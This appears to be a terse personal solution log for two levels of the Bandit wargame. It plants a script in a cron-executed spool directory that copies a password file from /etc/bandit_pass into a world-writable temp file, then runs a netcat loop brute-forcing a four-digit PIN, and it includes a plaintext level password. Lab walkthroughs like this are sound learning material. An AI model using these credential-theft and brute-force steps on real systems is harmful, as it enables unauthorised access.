bandit24

cd  /etc/cron.d/
ll

cat cronjob_bandit24

@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null


cat /usr/bin/cronjob_bandit24.sh

#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname/foo
echo "Executing and deleting all scripts in /var/spool/$myname/foo:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ]; then
            timeout -s 9 60 ./$i
        fi
        rm -f ./$i
    fi
done


touch /tmp/dslgldfsjgldfjl325345
chmod 777 /tmp/dslgldfsjgldfjl325345



touch /tmp/dslgldfsjgldfjl325345
chmod 777 /tmp/dslgldfsjgldfjl325345

touch /var/spool/bandit24/foo/testkhazar.sh
vim /var/spool/bandit24/foo/testkhazar.sh
----
#!/bin/bash

cat /etc/bandit_pass/bandit24 > /tmp/dslgldfsjgldfjl325345

----
chmod 777 /var/spool/bandit24/foo/testkhazar.sh

cat /var/spool/bandit24/foo/testkhazar.sh


cat /tmp/dslgldfsjgldfjl325345


bandit25
cd /tmp
touch abralsdgfkdfsl.sh
vim abralsdgfkdfsl.sh


#!/bin/bash

parol=gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8

for i in {0000..9999}; do
        echo "$parol $i"
done | nc localhost 30002





chmod 777 abralsdgfkdfsl.sh
./abralsdgfkdfsl.sh
